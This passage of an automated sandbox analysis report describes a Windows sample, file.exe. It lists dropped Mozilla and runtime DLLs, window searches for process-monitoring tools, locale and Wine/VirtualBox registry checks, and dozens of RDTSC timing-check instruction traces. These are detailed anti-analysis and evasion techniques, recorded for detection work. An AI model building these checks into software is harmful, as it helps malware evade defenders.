Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007A6103 push 76666E35h; mov dword ptr [esp], edx	0_2_007A60A4

Source: file.exe

Static PE information: section name: jgktddvv entropy: 7.954389095355929

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_003D9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58266

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 790163 second address: 790167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EB74 second address: 79EB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F2CBC529166h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EB83 second address: 79EBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2CBD27C5B1h 0x0000000c jl 00007F2CBD27C5ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79ECE5 second address: 79ECEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2F91 second address: 7A2FCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F2CBD27C5B8h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jng 00007F2CBD27C5B4h 0x0000001a push eax 0x0000001b push edx 0x0000001c jnl 00007F2CBD27C5A6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2FCD second address: 7A3022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a ja 00007F2CBC529166h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 jnc 00007F2CBC529170h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jo 00007F2CBC52917Fh 0x00000025 jmp 00007F2CBC529179h 0x0000002a pushad 0x0000002b jmp 00007F2CBC52916Ah 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3022 second address: 7A307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F2CBD27C5A8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 sub edx, dword ptr [ebp+122D3921h] 0x00000027 lea ebx, dword ptr [ebp+12454D49h] 0x0000002d mov edi, ecx 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 jmp 00007F2CBD27C5B8h 0x00000036 push eax 0x00000037 push edx 0x00000038 jng 00007F2CBD27C5A6h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A307C second address: 7A3088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A30BF second address: 7A30FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2CBD27C5B1h 0x0000000e nop 0x0000000f jbe 00007F2CBD27C5ACh 0x00000015 mov dword ptr [ebp+122D1FDAh], edx 0x0000001b push 00000000h 0x0000001d mov ecx, dword ptr [ebp+122D383Dh] 0x00000023 mov dh, E7h 0x00000025 push 3F1ADF06h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A30FA second address: 7A30FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A31E3 second address: 7A31E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A31E9 second address: 7A31ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A31ED second address: 7A3210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2CBD27C5B5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3210 second address: 7A322C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A322C second address: 7A329C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2CBD27C5AEh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F2CBD27C5B2h 0x00000015 push ecx 0x00000016 jbe 00007F2CBD27C5A6h 0x0000001c pop ecx 0x0000001d popad 0x0000001e pop eax 0x0000001f call 00007F2CBD27C5B9h 0x00000024 xor dword ptr [ebp+122D2D22h], ecx 0x0000002a pop esi 0x0000002b lea ebx, dword ptr [ebp+12454D52h] 0x00000031 mov cl, 67h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2CBD27C5B0h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3358 second address: 7A3362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2CBC529166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3362 second address: 7A33B5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CBD27C5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F2CBD27C5BEh 0x00000013 jmp 00007F2CBD27C5B8h 0x00000018 nop 0x00000019 and dx, 42D2h 0x0000001e mov dword ptr [ebp+122D2A3Ah], eax 0x00000024 push 00000000h 0x00000026 jne 00007F2CBD27C5ACh 0x0000002c xor esi, dword ptr [ebp+122D375Dh] 0x00000032 push 9FE2E52Fh 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jp 00007F2CBD27C5A6h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A33B5 second address: 7A3416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 601D1B51h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F2CBC529168h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jmp 00007F2CBC529175h 0x0000002d push 00000003h 0x0000002f add edi, 71E76F1Eh 0x00000035 push 00000000h 0x00000037 stc 0x00000038 push 00000003h 0x0000003a mov edi, eax 0x0000003c call 00007F2CBC529169h 0x00000041 push eax 0x00000042 push edx 0x00000043 push edx 0x00000044 jno 00007F2CBC529166h 0x0000004a pop edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3416 second address: 7A3435 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CBD27C5A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2CBD27C5AFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3435 second address: 7A3462 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2CBC52917Dh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3462 second address: 7A3466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3466 second address: 7A34C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2CBC529168h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jne 00007F2CBC529171h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jmp 00007F2CBC529173h 0x0000001e pop eax 0x0000001f mov dword ptr [ebp+122D1F38h], edi 0x00000025 lea ebx, dword ptr [ebp+12454D5Dh] 0x0000002b mov ecx, dword ptr [ebp+122D37EDh] 0x00000031 xchg eax, ebx 0x00000032 push ebx 0x00000033 jl 00007F2CBC529168h 0x00000039 pushad 0x0000003a popad 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A34C3 second address: 7A34C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A34C8 second address: 7A34CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1606 second address: 7C160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C18A5 second address: 7C18C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529178h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C18C1 second address: 7C18F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007F2CBD27C5A6h 0x00000011 popad 0x00000012 jno 00007F2CBD27C5B0h 0x00000018 jmp 00007F2CBD27C5B1h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1DE2 second address: 7C1DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1DE6 second address: 7C1E09 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CBD27C5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F2CBD27C5B9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1E09 second address: 7C1E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1E0F second address: 7C1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBD27C5ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2931 second address: 7C2935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6F04 second address: 7C6F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6F08 second address: 7C6F0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7042 second address: 7C706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edi 0x0000000a js 00007F2CBD27C5B8h 0x00000010 jmp 00007F2CBD27C5B2h 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C706C second address: 7C70A0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007F2CBC529172h 0x0000001c jg 00007F2CBC529166h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C70A0 second address: 7C70A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7226 second address: 7C722C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7954E7 second address: 7954F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2CBD27C5A6h 0x0000000a pop edx 0x0000000b pop esi 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD45D second address: 7CD463 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD463 second address: 7CD476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2CBD27C5AAh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD476 second address: 7CD47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD5FF second address: 7CD60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD60A second address: 7CD610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD610 second address: 7CD614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CDBA5 second address: 7CDBBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBC529171h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CDBBA second address: 7CDBC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CDD1C second address: 7CDD20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF8EA second address: 7CF8FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jbe 00007F2CBD27C5AEh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFA8A second address: 7CFA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFCF0 second address: 7CFCF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFCF4 second address: 7CFCF9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFCF9 second address: 7CFD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D10A2 second address: 7D10BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2CBC529176h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D10BF second address: 7D10C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1924 second address: 7D192E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D2BA5 second address: 7D2BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5697 second address: 7D56A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2CBC529166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D56A1 second address: 7D56AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D4994 second address: 7D49B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F2CBC529166h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2CBC529172h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D49B6 second address: 7D49BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D762A second address: 7D762E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D762E second address: 7D7638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7638 second address: 7D763C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5E03 second address: 7D5E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5E0B second address: 7D5E2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2CBC529178h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D763C second address: 7D76A0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2CBD27C5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F2CBD27C5B9h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F2CBD27C5A8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e and si, FE00h 0x00000033 adc di, A59Ch 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F2CBD27C5ADh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB64F second address: 7DB66E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2CBC52916Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F2CBC52916Ch 0x00000013 jo 00007F2CBC529166h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCB29 second address: 7DCB42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBD8D second address: 7DBD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
